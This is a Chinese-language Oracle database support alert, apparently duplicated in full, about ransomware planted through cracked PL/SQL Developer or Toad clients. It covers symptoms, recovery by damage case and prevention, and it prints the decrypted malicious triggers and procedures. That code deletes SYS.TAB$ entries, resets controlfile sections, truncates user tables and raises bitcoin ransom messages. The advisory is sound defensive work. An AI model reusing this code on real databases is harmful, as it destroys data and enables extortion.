對數據庫的“比特幣攻擊”及防護
ALERT: 數據庫存在遭受比特幣攻擊的風險
________________________________________
In this Document
________________________________________
APPLIES TO:
Oracle Database - any Edition - any Version
Information in this document applies to any platform.
DESCRIPTION
用戶使用客戶端連接數據庫或者數據庫Alert日誌中出現ORA-20312/ORA-20313/ORA-20315等報錯信息,描述數據庫已被鎖死,需要發送比特幣到某個地址來解鎖數據庫。
OCCURRENCE
客戶使用被惡意篡改的綠色版或破解版的客戶端軟件(如破解的PL/SQL Developer或者Toad等軟件)去連接數據庫,在此類軟件中,在連接成功後,調用注入的SQL腳本(Login.sql、AfterConnect.sql、toad.ini等)執行惡意代碼,在數據庫中生成三個觸發器和四個存儲過程。
當數據庫重啓或者用戶連接數據庫時,觸發器會調用相應的存儲過程操作數據庫。這些存儲過程會可能會破壞數據庫,並拋出錯誤信息和提示信息。
SYMPTONS
用戶使用客戶端連接數據庫或者數據庫Alert日誌中出現ORA-20312/ORA-20313/ORA-20315等報錯信息,描述數據庫已被鎖死,需要發送比特幣到某個地址來解鎖數據庫。這些注入腳本僞裝成Oracle內部程序:
--
-- Copyright (c) 1988, 2011, Oracle and/or its affiliates.
-- All rights reserved.
--
-- NAME
-- login.sql
--
-- DESCRIPTION
-- PL/SQL global login "site profile" file
--
-- Add any PL/SQL commands here that are to be executed when a
-- user starts PL/SQL, or uses the PL/SQL CONNECT command.
--
-- USAGE
-- This script is automatically run
--
-- This SQL was created by Oracle ; You should never remove/delete it!
-- MODIFIED (MM/DD/YY)
-- ……
兩個已知的報錯信息如下:
例子 1:
Alert.log 信息:
Thu Apr 13 13:48:55 2017
Errors in file /oracle/diag/rdbms/liantiaodb/liantiaodb/trace/liantiaodb_ora_5213.trc:
ORA-00604: 遞歸 SQL 級別 1 出現錯誤
ORA-20315: 你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 之後把你的Oracle SID郵寄地址 [email protected] 我們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.
ORA-06512: 在 "AIQRY.DBMS_CORE_INTERNAL ", line 25
ORA-06512: 在 line 2
例子 2 使用客戶端連接數據庫時報錯:
數據庫中存在被加密的存儲過程,名字如下:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
"DBMS_STANDARD_FUN9"
三個觸發器名字如下:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
WORKAROUND
None
SOLUTION
針對現在已經發現的比特幣攻擊問題的處理方法如下:
1. 刪除被惡意篡改的客戶端軟件
2. 根據不同的情況進行處理:
情況一:
SYSDATE-MIN(LAST_ANALYZED) 小於1200天
數據庫損壞情況:未損壞
處理辦法:
a.刪除三個觸發器:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
b.刪除四個存儲過錯:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
"DBMS_STANDARD_FUN9"
情況二:
SYSDATE-MIN(LAST_ANALYZED) 大於1200天,並且SYSDATE-CREATED大於1200天但未重啓 或者 SYSDATE-CREATED 小於1200天
數據庫損壞情況:某些表被truncate
處理方法:
a.刪除三個觸發器和四個存儲過程
b.使用備份把表恢復到truncate之前
c.使用DUL恢復(不一定能恢復所有的表,如truncate的空間已被使用)
情況三:
SYSDATE-CREATED 大於1200天
數據庫損壞情況:某些表被truncate以及tab$被刪除
處理方法:
a.刪除三個觸發器和四個存儲過程
b.使用備份把表恢復到truncate之前
c.使用ORACHK開頭的表恢復tab$
d.使用DUL恢復(不一定能恢復所有的表,如truncate的空間已被使用)
針對比特幣攻擊的預防措施:
1. 監控數據庫中是否有相應的觸發器和存儲過程。及時刪除相應觸發器和存儲過程。
2. 限制DBA權限的使用。
3. 檢查相關登錄工具的自動化腳本,清理有風險的腳本:
SQL*PLUS 中的glogin.sql/login.sql
Toad 中的toad.ini
PL/SQL Developer中的ogin.sql/AfterConnect.sql
4. 建議從官網下載工具,不要使用綠色版/破解版等。
REFERENCES
三個觸發器的代碼:
PROMPT Create "DBMS_SUPPORT_INTERNAL "
create or replace trigger "DBMS_SUPPORT_INTERNAL "
after startup on database
begin
"DBMS_SUPPORT_INTERNAL ";
end;
/
CREATE OR REPLACE TRIGGER "DBMS_SYSTEM_INTERNAL "
AFTER LOGON ON DATABASE
BEGIN
"DBMS_SYSTEM_INTERNAL ";
END;
/
CREATE OR REPLACE TRIGGER "DBMS_CORE_INTERNAL "
AFTER LOGON ON SCHEMA
BEGIN
"DBMS_CORE_INTERNAL ";
END;
/
四個加密的存儲過程的代碼解密後如下:
PROCEDURE "DBMS_SUPPORT_INTERNAL " IS
DATE1 INT :=10;
E1 EXCEPTION;
PRAGMA EXCEPTION_INIT(E1, -20312);
BEGIN
SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;
IF (DATE1>=1200) THEN
EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select * from sys.tab$';
DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38)) ;
COMMIT;
EXECUTE IMMEDIATE 'alter system checkpoint';
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(11);
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(12);
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(13);
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);
FOR I IN 1..2046 LOOP
DBMS_SYSTEM.KSDWRT(2, 'Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
DBMS_SYSTEM.KSDWRT(2, '你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 之後把你的Oracle SID郵寄地址 [email protected] 我們將讓你知道如何解鎖你的數據庫');
END LOOP;
RAISE E1;
END IF;
EXCEPTION
WHEN E1 THEN
RAISE_APPLICATION_ERROR(-20312,'你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 之後把你的Oracle SID郵寄地址 [email protected] 我們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
WHEN OTHERS THEN
NULL;
END;
/
PROCEDURE "DBMS_SYSTEM_INTERNAL " IS
DATE1 INT :=10;
E1 EXCEPTION;
PRAGMA EXCEPTION_INIT(E1, -20313);
BEGIN
SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');
IF (DATE1>=1200) THEN
IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE')
THEN
RAISE E1;
END IF;
END IF;
EXCEPTION
WHEN E1 THEN
RAISE_APPLICATION_ERROR(-20313,'你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 之後把你的Oracle SID郵寄地址 [email protected] 我們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
WHEN OTHERS THEN
NULL;
END;
/
PROCEDURE "DBMS_CORE_INTERNAL " IS
V_JOB NUMBER;
DATE1 INT :=10;
STAT VARCHAR2(2000);
V_MODULE VARCHAR2(2000);
E1 EXCEPTION;
PRAGMA EXCEPTION_INIT(E1, -20315);
CURSOR TLIST IS SELECT * FROM USER_TABLES WHERE TABLE_NAME NOT LIKE '%$%' AND TABLE_NAME NOT LIKE '%ORACHK%' AND CLUSTER_NAME IS NULL;
BEGIN
SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');
IF (DATE1>=1200) THEN
FOR I IN TLIST LOOP
DBMS_OUTPUT.PUT_LINE('table_name is ' ||I.TABLE_NAME);
STAT:='truncate table '||USER||'.'||I.TABLE_NAME;
DBMS_JOB.SUBMIT(V_JOB, 'DBMS_STANDARD_FUN9(''' || STAT || ''');', SYSDATE);
COMMIT;
END LOOP;
END IF;
IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE')
THEN
RAISE E1;
END IF;
EXCEPTION
WHEN E1 THEN
RAISE_APPLICATION_ERROR(-20315,'你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 之後把你的Oracle SID郵寄地址 [email protected] 我們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
WHEN OTHERS THEN
RAISE_APPLICATION_ERROR(-20315,'你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 之後把你的Oracle SID郵寄地址 [email protected] 我們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
END;
/
PROCEDURE DBMS_STANDARD_FUN9(V_DDL IN VARCHAR2)
IS
BEGIN
EXECUTE IMMEDIATE V_DDL;
END;
/
________________________________________
In this Document
Description
Occurrence
Symptoms
Workaround
Solution
References
________________________________________
APPLIES TO:
Oracle Database - any Edition - any Version
Information in this document applies to any platform.
DESCRIPTION
用戶使用客戶端連接數據庫或者數據庫Alert日誌中出現ORA-20312/ORA-20313/ORA-20315等報錯信息,描述數據庫已被鎖死,需要發送比特幣到某個地址來解鎖數據庫。
OCCURRENCE
客戶使用被惡意篡改的綠色版或破解版的客戶端軟件(如破解的PL/SQL Developer或者Toad等軟件)去連接數據庫,在此類軟件中,在連接成功後,調用注入的SQL腳本(Login.sql、AfterConnect.sql、toad.ini等)執行惡意代碼,在數據庫中生成三個觸發器和四個存儲過程。
當數據庫重啓或者用戶連接數據庫時,觸發器會調用相應的存儲過程操作數據庫。這些存儲過程會可能會破壞數據庫,並拋出錯誤信息和提示信息。
SYMPTONS
用戶使用客戶端連接數據庫或者數據庫Alert日誌中出現ORA-20312/ORA-20313/ORA-20315等報錯信息,描述數據庫已被鎖死,需要發送比特幣到某個地址來解鎖數據庫。這些注入腳本僞裝成Oracle內部程序:
--
-- Copyright (c) 1988, 2011, Oracle and/or its affiliates.
-- All rights reserved.
--
-- NAME
-- login.sql
--
-- DESCRIPTION
-- PL/SQL global login "site profile" file
--
-- Add any PL/SQL commands here that are to be executed when a
-- user starts PL/SQL, or uses the PL/SQL CONNECT command.
--
-- USAGE
-- This script is automatically run
--
-- This SQL was created by Oracle ; You should never remove/delete it!
-- MODIFIED (MM/DD/YY)
-- ……
兩個已知的報錯信息如下:
例子 1:
Alert.log 信息:
Thu Apr 13 13:48:55 2017
Errors in file /oracle/diag/rdbms/liantiaodb/liantiaodb/trace/liantiaodb_ora_5213.trc:
ORA-00604: 遞歸 SQL 級別 1 出現錯誤
ORA-20315: 你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 之後把你的Oracle SID郵寄地址 [email protected] 我們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.
ORA-06512: 在 "AIQRY.DBMS_CORE_INTERNAL ", line 25
ORA-06512: 在 line 2
例子 2 使用客戶端連接數據庫時報錯:
數據庫中存在被加密的存儲過程,名字如下:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
"DBMS_STANDARD_FUN9"
三個觸發器名字如下:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
WORKAROUND
None
SOLUTION
針對現在已經發現的比特幣攻擊問題的處理方法如下:
1. 刪除被惡意篡改的客戶端軟件
2. 根據不同的情況進行處理:
情況一:
SYSDATE-MIN(LAST_ANALYZED) 小於1200天
數據庫損壞情況:未損壞
處理辦法:
a.刪除三個觸發器:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
b.刪除四個存儲過錯:
"DBMS_SUPPORT_INTERNAL "
"DBMS_ SYSTEM_INTERNAL "
"DBMS_ CORE_INTERNAL "
"DBMS_STANDARD_FUN9"
情況二:
SYSDATE-MIN(LAST_ANALYZED) 大於1200天,並且SYSDATE-CREATED大於1200天但未重啓 或者 SYSDATE-CREATED 小於1200天
數據庫損壞情況:某些表被truncate
處理方法:
a.刪除三個觸發器和四個存儲過程
b.使用備份把表恢復到truncate之前
c.使用DUL恢復(不一定能恢復所有的表,如truncate的空間已被使用)
情況三:
SYSDATE-CREATED 大於1200天
數據庫損壞情況:某些表被truncate以及tab$被刪除
處理方法:
a.刪除三個觸發器和四個存儲過程
b.使用備份把表恢復到truncate之前
c.使用ORACHK開頭的表恢復tab$
d.使用DUL恢復(不一定能恢復所有的表,如truncate的空間已被使用)
針對比特幣攻擊的預防措施:
1. 監控數據庫中是否有相應的觸發器和存儲過程。及時刪除相應觸發器和存儲過程。
2. 限制DBA權限的使用。
3. 檢查相關登錄工具的自動化腳本,清理有風險的腳本:
SQL*PLUS 中的glogin.sql/login.sql
Toad 中的toad.ini
PL/SQL Developer中的ogin.sql/AfterConnect.sql
4. 建議從官網下載工具,不要使用綠色版/破解版等。
REFERENCES
三個觸發器的代碼:
PROMPT Create "DBMS_SUPPORT_INTERNAL "
create or replace trigger "DBMS_SUPPORT_INTERNAL "
after startup on database
begin
"DBMS_SUPPORT_INTERNAL ";
end;
/
CREATE OR REPLACE TRIGGER "DBMS_SYSTEM_INTERNAL "
AFTER LOGON ON DATABASE
BEGIN
"DBMS_SYSTEM_INTERNAL ";
END;
/
CREATE OR REPLACE TRIGGER "DBMS_CORE_INTERNAL "
AFTER LOGON ON SCHEMA
BEGIN
"DBMS_CORE_INTERNAL ";
END;
/
四個加密的存儲過程的代碼解密後如下:
PROCEDURE "DBMS_SUPPORT_INTERNAL " IS
DATE1 INT :=10;
E1 EXCEPTION;
PRAGMA EXCEPTION_INIT(E1, -20312);
BEGIN
SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;
IF (DATE1>=1200) THEN
EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select * from sys.tab$';
DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38)) ;
COMMIT;
EXECUTE IMMEDIATE 'alter system checkpoint';
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(11);
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(12);
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(13);
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);
FOR I IN 1..2046 LOOP
DBMS_SYSTEM.KSDWRT(2, 'Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
DBMS_SYSTEM.KSDWRT(2, '你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 之後把你的Oracle SID郵寄地址 [email protected] 我們將讓你知道如何解鎖你的數據庫');
END LOOP;
RAISE E1;
END IF;
EXCEPTION
WHEN E1 THEN
RAISE_APPLICATION_ERROR(-20312,'你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 之後把你的Oracle SID郵寄地址 [email protected] 我們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
WHEN OTHERS THEN
NULL;
END;
/
PROCEDURE "DBMS_SYSTEM_INTERNAL " IS
DATE1 INT :=10;
E1 EXCEPTION;
PRAGMA EXCEPTION_INIT(E1, -20313);
BEGIN
SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');
IF (DATE1>=1200) THEN
IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE')
THEN
RAISE E1;
END IF;
END IF;
EXCEPTION
WHEN E1 THEN
RAISE_APPLICATION_ERROR(-20313,'你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 之後把你的Oracle SID郵寄地址 [email protected] 我們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
WHEN OTHERS THEN
NULL;
END;
/
PROCEDURE "DBMS_CORE_INTERNAL " IS
V_JOB NUMBER;
DATE1 INT :=10;
STAT VARCHAR2(2000);
V_MODULE VARCHAR2(2000);
E1 EXCEPTION;
PRAGMA EXCEPTION_INIT(E1, -20315);
CURSOR TLIST IS SELECT * FROM USER_TABLES WHERE TABLE_NAME NOT LIKE '%$%' AND TABLE_NAME NOT LIKE '%ORACHK%' AND CLUSTER_NAME IS NULL;
BEGIN
SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');
IF (DATE1>=1200) THEN
FOR I IN TLIST LOOP
DBMS_OUTPUT.PUT_LINE('table_name is ' ||I.TABLE_NAME);
STAT:='truncate table '||USER||'.'||I.TABLE_NAME;
DBMS_JOB.SUBMIT(V_JOB, 'DBMS_STANDARD_FUN9(''' || STAT || ''');', SYSDATE);
COMMIT;
END LOOP;
END IF;
IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE')
THEN
RAISE E1;
END IF;
EXCEPTION
WHEN E1 THEN
RAISE_APPLICATION_ERROR(-20315,'你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 之後把你的Oracle SID郵寄地址 [email protected] 我們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
WHEN OTHERS THEN
RAISE_APPLICATION_ERROR(-20315,'你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 之後把你的Oracle SID郵寄地址 [email protected] 我們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
END;
/
PROCEDURE DBMS_STANDARD_FUN9(V_DDL IN VARCHAR2)
IS
BEGIN
EXECUTE IMMEDIATE V_DDL;
END;
/